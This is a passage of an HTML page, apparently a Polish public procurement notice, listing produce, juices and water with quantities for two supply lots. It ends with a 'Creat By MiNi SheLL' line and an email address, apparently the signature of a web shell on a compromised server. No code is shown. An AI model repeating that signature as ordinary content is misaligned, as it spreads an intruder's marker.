35.	Napój 2l czarna porzeczka	szt	230			
36.	Oranżada  1,5l	szt	80			
37	Woda Gazowana  0,5l	szt	180			
38	Woda Niegazowana0,5l	szt	180			
39	Woda Gazowana 1,5l	szt	180			
40 	Woda Niegazowana 1,5 l.	szt	180			
41.	Soki owocowe 100% 200ml	szt	405			
42.	Sok Witaminka 250ml.	szt	1000			
43.	Napoje    1l (granat)	szt	180			
44	Napoje    1l (winogrono)	szt	180			
45	Napoje owocowy  1l jabłko,wiśnia	szt	30			
46.	Sok  100% 2l (pomarańcza)	szt	30			
47	Nektar 1l czarna porzeczka	szt	30			
48	Pomarańcza	kg	180			
49	Kiwi	kg	135			
50	Pory	kg	20			
51	Grejpfruty	kg	180			
52	Granaty	szt	540.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> 8. PAKIET NR VIII Warzywa konserwowe lub puszkowe CPV 1531400-1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Jabłka	kg	100			
2.	Cytryny	kg	63			
3.	Banany	kg	700			
4.	Szczypiorek pęk	szt	526			
5.	Cebula	kg	560			
6.	Cebula zielona pęk	szt	50			
7.	Kapusta kwaszona	kg	500			
8.	Kapusta świeża	szt	50			
9.	Kapusta biała	kg	660			
10.	Kapusta czerwona	kg	200			
11.	Kapusta pekińska	szt	794			
12.	Rzodkiewka pęk	szt	150			
13.	Pieczarki świeże	kg	154			
14.	Pomidory	kg	720			
15.	Ogórki kwaszone	kg	150			
16.	Ogórki świeże	kg	200			
17.	Sałata zielona	szt	1000			
18.	Marchew	kg	2100			
19.	Burak ćwikłowy	kg	600			
20.	Seler korzeń	kg	420			
21.	Natka pietruszki	szt	450			
22.	Fasola karłowa Jaś	kg	142			
23.	Groch łuszczony	kg	135			
24.	Czosnek	kg	13			
25	Ziemniaki	kg	10900			
26	Sok -300ml.	szt	2000			
27	Papryka świeża	kg	100			
28.	Pietruszka korzeń	kg	160			
29.	Mandarynki	kg	200			
30.	Klementynki	kg	290			
31	Winogrono białe	kg	200			
32	Winogrono ciemne	kg	200			
33.	Koper pęk	szt	30			
34.	Sok pomidorowy -330ml	szt	200			
35.	Napój 2l czarna porzeczka	szt	230			
36.	Oranżada  1,5l	szt	80			
37	Woda Gazowana  0,5l	szt	180			
38	Woda Niegazowana0,5l	szt	180			
39	Woda Gazowana 1,5l	szt	180			
40 	Woda Niegazowana 1,5 l.	szt	180			
41.	Soki owocowe 100% 200ml	szt	405			
42.	Sok Witaminka 250ml.	szt	1000			
43.	Napoje    1l (granat)	szt	180			
44	Napoje    1l (winogrono)	szt	180			
45	Napoje owocowy  1l jabłko,wiśnia	szt	30			
46.	Sok  100% 2l (pomarańcza)	szt	30			
47	Nektar 1l czarna porzeczka	szt	30			
48	Pomarańcza	kg	180			
49	Kiwi	kg	135			
50	Pory	kg	20			
51	Grejpfruty	kg	180			
52	Granaty	szt	540.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com